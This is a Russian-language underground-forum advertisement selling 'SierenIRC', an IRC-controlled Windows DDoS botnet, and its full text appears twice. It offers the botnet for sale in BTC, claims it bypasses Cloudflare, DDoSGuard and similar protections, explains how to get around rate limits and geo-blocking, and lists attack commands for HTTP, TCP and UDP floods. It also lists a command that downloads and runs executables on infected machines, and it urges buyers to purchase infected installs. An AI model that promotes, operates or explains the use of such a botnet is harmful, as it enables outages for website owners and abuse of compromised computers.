SierenIRC - лучший windows DDoS ботнет.
Создан чтобы убивать САЙТЫ:
Данный тип ботнета менее затратен в использовании, чем, к примеру, знаменитый Storm! и ему подобные linux системы, здесь не нужны сервера, здесь нужны только загрузки, которые можно сравнительно дёшего купить на просторах теневого рынка. Но не будем забывать, что у SierenIRC немного другие варианты использования, в первую очередь это HTTP флуды. Бот действительно способен обойти любую JS+Cookies based защиту, тот же CloudFlare или Voxility, DDoSGuard и популярные сервера OVH с установленным nginx cookies test module, incapsula, qrator.net и другие. Наша система полностью имитирует пользователя, да, я знаю, что так писали уже про многие ботнеты, но только в нашем это действительно работает как надо.
Вариантов защититься от SierenIRC, пока просто нет:
Да, можно установить лимиты запросов так, что боты просто не будут попадать на сайт при слишком частых запросах. Но всё решается настройками sleep на 500 и thread на 1. Бот будет делать 2 запроса в секунду, что полностью обойдёт данное ограничение. Да, просто понадобится больше онлайна.
Можно бороться используя гео ограничения, но опять же, просто нужен более разнообразный в географическом плане ботнет, или например целевой, т.е ру боты для ру сайтов.
Всё это не просто красивые слова, все выводы сделаны из многочисленных тестов, проведённых нашей командой. Мы сутками держали сайты, находившиеся под вышеперечисленными защитами.
Тут как то подвернуся билдер Hidden DDoS Botnet:
Сравнение кол-ва запросов,на максимальных скоростях (потоках) с последним творением Sokola (автора знаменитого Dirt Jumper) Hidden DDoS Botnet (online 300) nginx status stub module:
Hidden DDoS Bot - 8k req/sec
SierenIRC - 70k req/sec
Кстате SierenIRC был на 70% от мощности максимальных потоков, а вот Hidden работал в 999 потоков.
Хотите верьте, а хотите купите и проверьте
Краткие характеристики системы:
Управляется с помощью IRC
Написан на чистом C#, вес 54кб
10 типов атак: 5 http типов, 4 tcp, 1 udp.
Мультизадачность (можно атаковать много сайтов, в разумных пределах конечно
Примеры атакующих команд:
HTTP:
!jsbypass {url/multiurl seperated by |} {seconds} {type} {threads} {sleep} - Один из методов атаки, уникальность его в том что он может автоматически обойти ЛЮБУЮ защиту базированную на js/cookie (e.g. cloudflare, blazingfast.io 5 sec protection, others).
!http {url/multiurl seperated by |} {seconds} {type} {threads} {sleep} - Самый стандартный тип атаки из всех которые тут есть, простые HTTP запросы.
!httpstrong {url} {seconds} {type} {threads} - Самый сильный тип атаки, поддерживает только 1 URL и позволяет вам генерировать максимальное кол-во запросов в секунду которые пойдут в бэкенд сервера.
!post {url/multiurl seperated by |} {seconds} {data} {threads} {sleep} - Собственный POST флуд
!httpdrain {url/multiurl seperated by |} {seconds} {type} {threads} {sleep} - "Сжирает" огромное кол-во пропускной способности
TCP:
!conhold {ip} {port} {seconds} {sockets} {threads} - Собственно написанный метод TCP атаки, может обхоидть большое кол-во ддос защит разного вида и идти напрямую в back-end сервера, к примеру, вы можете "уложить" защиту buyvmdotnet используя данный метод с 30 ботов.
!condis {ip} {port} {seconds} {sockets} {threads} - Собственно написанный метод TCP атаки, тоже самое что и conhold, так-же может помочь обойти несколько видов ддос-защит и отправить нашу атаку напрямую в back-end сервера.
!tcpsmash {ip} {port} {seconds} {sockets} {threads} {size} - Собственно написанный метод TCP атаки, работает так-же как и два предыдущих, только используя немного другие "методы", тем самым метод опять же позволяет обойти определенные ддос-защиты.
!rawtcp {ip} {port} {seconds} {size} {threads} - Стандартная TCP атака.
UDP:
!rawudp {ip} {port} {seconds} {size} {threads} - Стандартная UDP атака.
Примеры вспомогательных команд:
Команда:
!stopall - Остановка всех выполняемых команд.
!stop {url/ip:port} - Остановка определенной команды.
Команда:
!isup http://site.ru {stringtocheckfor/port} - Проверка на то доступен ли для ботов URL/IP
Ответ:
http://site.ru | ICMP: Success | TCP: Success | HTTP: 200 | StringCheck: Fail
Команда:
!currentattackcount - Подсчитывание кол-ва текущих задач (атак).
Команда:
!dlexec {url} - Скачивает файл на ботов и запускает его (.exe расширение файла)
!update {url} - Обновляет бота (думаю все тут знают что такое апдейт)
Команда:
!uninstall {botname} - Удаляет бота с зараженной системы (удаляя старт-ап).
!exit {botname} - Заставляет бота закрыться, однако не удаляет запуск (старт-ап).
!version - Показывает версию билда.
Команда:
!talk {botname/*} - Когда бот "разговаривает", это значит что он отвечает на ваши команды, например если вы отправите команду атаки, то он когда примет команду и начнет "работу" ответит вам в стиле: атака начата, будет длиться * секунд по цели *. Это так-же работает как переключатель, чтобы "заставить" бота замолчать, просто напишите эту же команду в отношении бота который уже говорит.
!joincpu {channel} {minimumbenchmark} - Боты которых бенчмарк выше того который вы установили или имеют тот же бенчмарк переходят в указанный вами канал на IRC сервере
Да да, на основе теста CPU, бот присваивает себе рейтинг.
Группировка ботов:
!joinpercent {channel} {percentageofbots} - Определенный процент ботов входят в канал который в указали на вашем IRC сервере
!partchannel {channel} {percentageofbots} - Тоже самое как и !joinpercent, но это для того чтобы покинуть канал (боты отправляются в основной канал сервера).
Как видите, всё очень продумано. Если у наших клиентов возникнут классные идеи, мы обязательно воплотим их в жизнь в наших обновлениях!
Цена системы для первых 5 клиентов: 1500 USD
Далее цена составит: 2500 USD
Оплата принимается исключительно в BTC
Связь:
Автор: nathanw@exploit.im (OTR please).
Представитель автора на русскоговорящих форумах: pizdez@exploit.im (OTR please).
Создан чтобы убивать САЙТЫ:
Данный тип ботнета менее затратен в использовании, чем, к примеру, знаменитый Storm! и ему подобные linux системы, здесь не нужны сервера, здесь нужны только загрузки, которые можно сравнительно дёшего купить на просторах теневого рынка. Но не будем забывать, что у SierenIRC немного другие варианты использования, в первую очередь это HTTP флуды. Бот действительно способен обойти любую JS+Cookies based защиту, тот же CloudFlare или Voxility, DDoSGuard и популярные сервера OVH с установленным nginx cookies test module, incapsula, qrator.net и другие. Наша система полностью имитирует пользователя, да, я знаю, что так писали уже про многие ботнеты, но только в нашем это действительно работает как надо.
Вариантов защититься от SierenIRC, пока просто нет:
Да, можно установить лимиты запросов так, что боты просто не будут попадать на сайт при слишком частых запросах. Но всё решается настройками sleep на 500 и thread на 1. Бот будет делать 2 запроса в секунду, что полностью обойдёт данное ограничение. Да, просто понадобится больше онлайна.
Можно бороться используя гео ограничения, но опять же, просто нужен более разнообразный в географическом плане ботнет, или например целевой, т.е ру боты для ру сайтов.
Всё это не просто красивые слова, все выводы сделаны из многочисленных тестов, проведённых нашей командой. Мы сутками держали сайты, находившиеся под вышеперечисленными защитами.
Тут как то подвернуся билдер Hidden DDoS Botnet:
Сравнение кол-ва запросов,на максимальных скоростях (потоках) с последним творением Sokola (автора знаменитого Dirt Jumper) Hidden DDoS Botnet (online 300) nginx status stub module:
Hidden DDoS Bot - 8k req/sec
SierenIRC - 70k req/sec
Кстате SierenIRC был на 70% от мощности максимальных потоков, а вот Hidden работал в 999 потоков.
Хотите верьте, а хотите купите и проверьте
Краткие характеристики системы:
Управляется с помощью IRC
Написан на чистом C#, вес 54кб
10 типов атак: 5 http типов, 4 tcp, 1 udp.
Мультизадачность (можно атаковать много сайтов, в разумных пределах конечно
Примеры атакующих команд:
HTTP:
!jsbypass {url/multiurl seperated by |} {seconds} {type} {threads} {sleep} - Один из методов атаки, уникальность его в том что он может автоматически обойти ЛЮБУЮ защиту базированную на js/cookie (e.g. cloudflare, blazingfast.io 5 sec protection, others).
!http {url/multiurl seperated by |} {seconds} {type} {threads} {sleep} - Самый стандартный тип атаки из всех которые тут есть, простые HTTP запросы.
!httpstrong {url} {seconds} {type} {threads} - Самый сильный тип атаки, поддерживает только 1 URL и позволяет вам генерировать максимальное кол-во запросов в секунду которые пойдут в бэкенд сервера.
!post {url/multiurl seperated by |} {seconds} {data} {threads} {sleep} - Собственный POST флуд
!httpdrain {url/multiurl seperated by |} {seconds} {type} {threads} {sleep} - "Сжирает" огромное кол-во пропускной способности
TCP:
!conhold {ip} {port} {seconds} {sockets} {threads} - Собственно написанный метод TCP атаки, может обхоидть большое кол-во ддос защит разного вида и идти напрямую в back-end сервера, к примеру, вы можете "уложить" защиту buyvmdotnet используя данный метод с 30 ботов.
!condis {ip} {port} {seconds} {sockets} {threads} - Собственно написанный метод TCP атаки, тоже самое что и conhold, так-же может помочь обойти несколько видов ддос-защит и отправить нашу атаку напрямую в back-end сервера.
!tcpsmash {ip} {port} {seconds} {sockets} {threads} {size} - Собственно написанный метод TCP атаки, работает так-же как и два предыдущих, только используя немного другие "методы", тем самым метод опять же позволяет обойти определенные ддос-защиты.
!rawtcp {ip} {port} {seconds} {size} {threads} - Стандартная TCP атака.
UDP:
!rawudp {ip} {port} {seconds} {size} {threads} - Стандартная UDP атака.
Примеры вспомогательных команд:
Команда:
!stopall - Остановка всех выполняемых команд.
!stop {url/ip:port} - Остановка определенной команды.
Команда:
!isup http://site.ru {stringtocheckfor/port} - Проверка на то доступен ли для ботов URL/IP
Ответ:
http://site.ru | ICMP: Success | TCP: Success | HTTP: 200 | StringCheck: Fail
Команда:
!currentattackcount - Подсчитывание кол-ва текущих задач (атак).
Команда:
!dlexec {url} - Скачивает файл на ботов и запускает его (.exe расширение файла)
!update {url} - Обновляет бота (думаю все тут знают что такое апдейт)
Команда:
!uninstall {botname} - Удаляет бота с зараженной системы (удаляя старт-ап).
!exit {botname} - Заставляет бота закрыться, однако не удаляет запуск (старт-ап).
!version - Показывает версию билда.
Команда:
!talk {botname/*} - Когда бот "разговаривает", это значит что он отвечает на ваши команды, например если вы отправите команду атаки, то он когда примет команду и начнет "работу" ответит вам в стиле: атака начата, будет длиться * секунд по цели *. Это так-же работает как переключатель, чтобы "заставить" бота замолчать, просто напишите эту же команду в отношении бота который уже говорит.
!joincpu {channel} {minimumbenchmark} - Боты которых бенчмарк выше того который вы установили или имеют тот же бенчмарк переходят в указанный вами канал на IRC сервере
Да да, на основе теста CPU, бот присваивает себе рейтинг.
Группировка ботов:
!joinpercent {channel} {percentageofbots} - Определенный процент ботов входят в канал который в указали на вашем IRC сервере
!partchannel {channel} {percentageofbots} - Тоже самое как и !joinpercent, но это для того чтобы покинуть канал (боты отправляются в основной канал сервера).
Как видите, всё очень продумано. Если у наших клиентов возникнут классные идеи, мы обязательно воплотим их в жизнь в наших обновлениях!
Цена системы для первых 5 клиентов: 1500 USD
Далее цена составит: 2500 USD
Оплата принимается исключительно в BTC
Связь:
Автор: nathanw@exploit.im (OTR please).
Представитель автора на русскоговорящих форумах: pizdez@exploit.im (OTR please).